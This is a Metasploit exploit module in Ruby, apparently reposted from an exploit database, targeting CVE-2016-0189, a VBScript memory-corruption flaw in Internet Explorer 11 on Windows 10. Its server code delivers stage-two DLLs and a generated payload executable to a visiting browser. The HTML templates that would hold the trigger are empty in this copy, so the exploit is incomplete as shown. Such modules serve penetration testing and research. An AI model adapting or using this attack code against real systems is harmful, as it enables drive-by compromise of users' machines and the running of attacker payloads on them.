## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Internet Explorer 11 VBScript Engine Memory Corruption", 'Description' => %q{ This module exploits the memory corruption vulnerability (CVE-2016-0189) present in the VBScript engine of Internet Explorer 11. }, 'License' => MSF_LICENSE, 'Author' => [ 'Theori', # Original RE research and exploitation 'William Webb ' # Metasploit module ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'Windows 10 with IE 11', { } ] ], 'References' => [ [ 'CVE', '2016-0189' ], [ 'MSB', 'MS16-051' ] ], 'Arch' => ARCH_X86_64, 'DisclosureDate' => "May 10 2016", 'DefaultTarget' => 0)) end def setup # @stage2html = Rex::Text.rand_text_alphanum(6) @ieshell = "#{Rex::Text.rand_text_alphanumeric(6)}" # ieshell32.dll uri @localsrv = "#{Rex::Text.rand_text_alphanumeric(6)}" # ielocalserver.dll uri @pm_escape_html = "#{Rex::Text.rand_text_alphanumeric(6)}" # vbscipt_godmode.html @payload_uri = "#{Rex::Text.rand_text_alphanumeric(8)}" @payload_exe = "#{Rex::Text.rand_text_alpha(6)}.exe" File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ieshell32.dll" ), "rb") { |f| @stage2dll = f.read } File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ielocalserver.dll" ), "rb") { |f| @localserver = f.read } super end def exploit_html(req_uri) srvhost = datastore['SRVHOST'] srvport = datastore['SRVPORT'] template = <<-EOF EOF template end def stage2_html(req_uri) template = <<-EOF EOF template end def on_request_uri(cli, request) # used for some debugging stuff ies = @ieshell ls = @localsrv pm = @pm_escape_html print_status("Received request: #{request.uri}") if request.uri =~ /.*#{ies}.*$/ print_status("Sending stage two DLL ...") send_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' }) elsif request.uri =~ /.*#{ls}.*$/ print_status("Sending local server DLL ...") send_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' }) elsif request.uri =~ /.*#{pm}.*$/ rq = "#{get_resource.chomp('/')}" gm = stage2_html(rq) send_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' }) elsif request.uri =~ /.*#{@payload_uri}$/ return if ((payload = regenerate_payload(cli)) == nil) print_status("Sending payload ...") send_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' }) else print_status("Sending main page ..") send_response(cli, exploit_html(request.uri)) end end end # Iranian Exploit DataBase = http://IeDb.Ir [2016-08-06]